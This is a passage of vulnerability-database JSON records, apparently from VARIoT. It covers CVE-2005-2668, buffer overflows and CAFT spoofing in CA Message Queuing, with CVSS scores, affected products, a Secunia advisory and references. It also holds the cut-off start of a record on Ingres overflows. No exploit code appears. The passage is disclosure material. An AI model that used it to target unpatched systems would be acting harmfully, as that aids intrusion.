"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:cleverpath_aion:10.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:cleverpath_ecm:3.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:cleverpath_olap:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:cleverpath_predictive_analysis_server:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_management:3.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_management:3.2:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_management:3.2:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_management:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_nsm_wireless_network_management_option:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_performance_management:2.4:sp3:openvms:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_tng:2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_tng:2.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_tng:2.2:*:*:ja:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_tng:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_san_manager:1.1:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_san_manager:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:cleverpath_predictive_analysis_server:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_admin:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_admin:2.9:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:messaging:1.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_application_performance_monitor:3.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_data_transport_option:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_enterprise_job_manager:1.0:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:4.1:*:microsoft_exchange:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:5.0.1:*:web_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_management_portal:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_remote_control:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_level_management:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_software_delivery:3.1:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_software_delivery:4.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_tng:2.4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2668"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The discoverer of this vulnerability is currently unknown. The vendor disclosed this issue.",
"sources": [
{
"db": "BID",
"id": "14622"
}
],
"trust": 0.3
},
"cve": "CVE-2005-2668",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2005-2668",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-13877",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-2668",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#619988",
"trust": 0.8,
"value": "13.13"
},
{
"author": "CNNVD",
"id": "CNNVD-200508-250",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-13877",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13877"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"db": "NVD",
"id": "CVE-2005-2668"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple buffer overflows in Computer Associates (CA) Message Queuing (CAM / CAFT) 1.05, 1.07 before Build 220_13, and 1.11 before Build 29_13 allow remote attackers to execute arbitrary code via unknown vectors. This may allow an attacker to escalate their privileges to SYSTEM level. CA Unicenter Management Portal provides access to enterprise management information and various Unicenter management solutions such as personalized WEB interface. \n\n----------------------------------------------------------------------\n\nBist Du interessiert an einem neuen Job in IT-Sicherheit?\n\n\nSecunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-\nSicherheit:\nhttp://secunia.com/secunia_vacancies/\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Various Products Message Queuing Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA16513\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/16513/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nSpoofing, DoS, System access\n\nWHERE:\n\u003eFrom local network\n\nSOFTWARE:\nCA Unicenter TNG 2.x\nhttp://secunia.com/product/3206/\nCA Unicenter Software Delivery 4.x\nhttp://secunia.com/product/5597/\nCA Unicenter Software Delivery 3.x\nhttp://secunia.com/product/5596/\nCA Unicenter Service Level Management 3.x\nhttp://secunia.com/product/5595/\nCA Unicenter Remote Control 6.x\nhttp://secunia.com/product/2622/\nCA Unicenter Performance Management for OpenVMS 2.x\nhttp://secunia.com/product/5573/\nCA Unicenter Network and Systems Management (NSM) Wireless Network\nManagement Option 3.x\nhttp://secunia.com/product/5594/\nCA Unicenter Network and Systems Management (NSM) 3.x\nhttp://secunia.com/product/1683/\nCA Unicenter Management for WebSphere MQ 3.x\nhttp://secunia.com/product/5590/\nCA Unicenter Management for Web Servers 5.x\nhttp://secunia.com/product/5593/\nCA Unicenter Management for Microsoft Exchange 4.x\nhttp://secunia.com/product/5591/\nCA Unicenter Management for Lotus Notes/Domino 4.x\nhttp://secunia.com/product/5592/\nCA Unicenter Jasmine 3.x\nhttp://secunia.com/product/5589/\nCA Unicenter Enterprise Job Manager 1.x\nhttp://secunia.com/product/5588/\nCA Unicenter Data Transport Option 2.x\nhttp://secunia.com/product/5587/\nCA Unicenter Asset Management 4.x\nhttp://secunia.com/product/1682/\nCA Unicenter Asset Management 3.x\nhttp://secunia.com/product/5586/\nCA Unicenter Application Performance Monitor 3.x\nhttp://secunia.com/product/5585/\nCA eTrust Admin 8.x\nhttp://secunia.com/product/5584/\nCA eTrust Admin 2.x\nhttp://secunia.com/product/5583/\nCA CleverPath Predictive Analysis Server 3.x\nhttp://secunia.com/product/5581/\nCA CleverPath Predictive Analysis Server 2.x\nhttp://secunia.com/product/5580/\nCA CleverPath OLAP 5.x\nhttp://secunia.com/product/5578/\nCA CleverPath Enterprise Content Manager (ECM) 3.x\nhttp://secunia.com/product/5579/\nCA CleverPath Aion 10.x\nhttp://secunia.com/product/5582/\nCA BrightStor SAN Manager 11.x\nhttp://secunia.com/product/5576/\nCA BrightStor SAN Manager 1.x\nhttp://secunia.com/product/5575/\nCA BrightStor Portal 11.x\nhttp://secunia.com/product/5577/\nCA Advantage Data Transport 3.x\nhttp://secunia.com/product/5574/\n\nDESCRIPTION:\nSome vulnerabilities have been reported in various products within\nthe CA Message Queuing (CAM / CAFT) software, which can be exploited\nby malicious people to cause a DoS (Denial of Service) or compromise\na vulnerable system. \n\n1) An unspecified error in the CAM service can be exploited to cause\na DoS by sending specially crafted packets to the TCP port. \n\n2) Unspecified boundary errors can be exploited to cause buffer\noverflows by sending specially crafted packets to the service. \n\n3) An error can be exploited to spoof CAFT and execute arbitrary\ncommands with escalated privileges. \n\nThe vulnerabilities affect all versions of the CA Message Queuing\nsoftware prior to versions 1.07 Build 220_13 and 1.11 Build 29_13. \n\nSOLUTION:\nApply patches (see vendor advisory for details). \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by vendor. \n\nORIGINAL ADVISORY:\nComputer Associates:\nhttp://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2668"
},
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"db": "BID",
"id": "14622"
},
{
"db": "VULHUB",
"id": "VHN-13877"
},
{
"db": "PACKETSTORM",
"id": "39503"
}
],
"trust": 2.79
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-13877",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-13877"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "14622",
"trust": 3.6
},
{
"db": "SECUNIA",
"id": "16513",
"trust": 3.4
},
{
"db": "CERT/CC",
"id": "VU#619988",
"trust": 3.3
},
{
"db": "NVD",
"id": "CVE-2005-2668",
"trust": 2.8
},
{
"db": "OSVDB",
"id": "18916",
"trust": 2.5
},
{
"db": "VUPEN",
"id": "ADV-2005-1482",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1014756",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014760",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014761",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014763",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014764",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014765",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014766",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014767",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014768",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014769",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014770",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014771",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014772",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014773",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014774",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014775",
"trust": 0.8
},
{
"db": "BID",
"id": "14623",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000834",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200508-250",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "16825",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "83148",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-71327",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-13877",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "39503",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13877"
},
{
"db": "BID",
"id": "14622"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"db": "PACKETSTORM",
"id": "39503"
},
{
"db": "NVD",
"id": "CVE-2005-2668"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
}
]
},
"id": "VAR-200508-0051",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-13877"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:53:37.537000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "camsecurity_notice",
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp"
},
{
"title": "CA Unicenter CAM Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146854"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2668"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "http://www.securityfocus.com/bid/14622"
},
{
"trust": 2.9,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp"
},
{
"trust": 2.5,
"url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=32919"
},
{
"trust": 2.5,
"url": "http://www.kb.cert.org/vuls/id/619988"
},
{
"trust": 2.5,
"url": "http://secunia.com/advisories/16513"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/18916"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2005/1482"
},
{
"trust": 0.9,
"url": "http://secunia.com/advisories/16513/"
},
{
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_faqs.asp"
},
{
"trust": 0.8,
"url": "http://osvdb.org/displayvuln.php?osvdb_id=18916"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014775.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014774.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014773.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014772.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014771.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014770.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014769.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014768.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014767.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014766.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014765.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014764.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014763.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014761.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014760.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014756.html"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/14623"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2005-2668"
},
{
"trust": 0.8,
"url": "http://www.frsirt.com/english/advisories/2005/1482"
},
{
"trust": 0.8,
"url": "http://jvn.jp//cert/jvnvu619988/"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2005-2668"
},
{
"trust": 0.3,
"url": "http://www.designfolks.com.au/karma/cam/"
},
{
"trust": 0.3,
"url": "http://www.ca.com/"
},
{
"trust": 0.3,
"url": "/archive/1/408817"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5586/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5575/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5581/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5574/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5585/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5580/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5595/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5587/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5594/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5591/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5583/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5576/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1682/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5577/"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5590/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5582/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_vacancies/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3206/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5596/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2622/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5588/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5584/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5578/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5573/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5579/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1683/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5589/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5593/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5592/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5597/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13877"
},
{
"db": "BID",
"id": "14622"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"db": "PACKETSTORM",
"id": "39503"
},
{
"db": "NVD",
"id": "CVE-2005-2668"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13877"
},
{
"db": "BID",
"id": "14622"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"db": "PACKETSTORM",
"id": "39503"
},
{
"db": "NVD",
"id": "CVE-2005-2668"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-08-23T00:00:00",
"db": "CERT/CC",
"id": "VU#619988"
},
{
"date": "2005-08-23T00:00:00",
"db": "VULHUB",
"id": "VHN-13877"
},
{
"date": "2005-08-22T00:00:00",
"db": "BID",
"id": "14622"
},
{
"date": "2008-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"date": "2005-08-23T23:30:33",
"db": "PACKETSTORM",
"id": "39503"
},
{
"date": "2005-08-23T04:00:00",
"db": "NVD",
"id": "CVE-2005-2668"
},
{
"date": "2005-08-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200508-250"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-10-21T00:00:00",
"db": "CERT/CC",
"id": "VU#619988"
},
{
"date": "2017-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-13877"
},
{
"date": "2007-11-15T00:37:00",
"db": "BID",
"id": "14622"
},
{
"date": "2008-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"date": "2021-04-14T15:46:28.003000",
"db": "NVD",
"id": "CVE-2005-2668"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200508-250"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Computer Associates Message Queuing software vulnerable to buffer overflows",
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
}
],
"trust": 0.6
}
}
VAR-200706-0395
Vulnerability from variot - Updated: 2023-12-18 12:46Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.
3) Ingres wakeup file overwrite (reported by NGSSoftware) [Ingres bug 115913, CVE-2007-3337, CAID 35451] Description: The "wakeup" binary creates a file named "alarmwkp.def" in the current directory, truncating the file if it already exists. The "wakeup" binary is setuid "ingres" and world-executable. Consequently, an attacker can truncate a file with the privileges of the "ingres" user.
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: An attacker can pass a long string as an argument to uuid_from_char() to cause a stack buffer overflow and the saved returned address can be overwritten.
5) Ingres verifydb local stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: A local attacker can exploit a stack overflow in the Ingres verifydb utility duve_get_args function. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2023. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2022.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High risk rating.
Affected Products: Advantage Data Transformer r2.2 AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1 AllFusion Harvest Change Manager r7, r7.1 BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and Mainframe Linux) BrightStor ARCserve Backup for Laptops and Desktops r11.5 BrightStor Enterprise Backup (Unix only) r10.5 BrightStor Storage Command Center r11.5 BrightStor Storage Resource Manager r11.5 CleverPath Aion Business Rules Expert r10.1 CleverPath Aion Business Process Monitoring r10.1 CleverPath Predictive Analysis Server r3 DocServer 1.1 eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 eTrust Audit r8 SP2 eTrust Directory r8.1 eTrust IAM Suite r8.0 eTrust IAM Toolkit r8.0, r8.1 eTrust Identity Manager r8.1 eTrust Network Forensics r8.1 eTrust Secure Content Manager r8 eTrust Single Sign-On r7, r8, r8.1 eTrust Web Access Control 1.0 Unicenter Advanced Systems Management r11 Unicenter Asset Intelligence r11 Unicenter Asset Management r11 Unicenter Asset Portfolio Management r11.2.1, r11.3 Unicenter CCS r11 Unicenter Database Command Center r11.1 Unicenter Desktop and Server Management r11 Unicenter Desktop Management Suite r11 Unicenter Enterprise Job Manager r1 SP3, r1 SP4 Unicenter Job Management Option r11 Unicenter 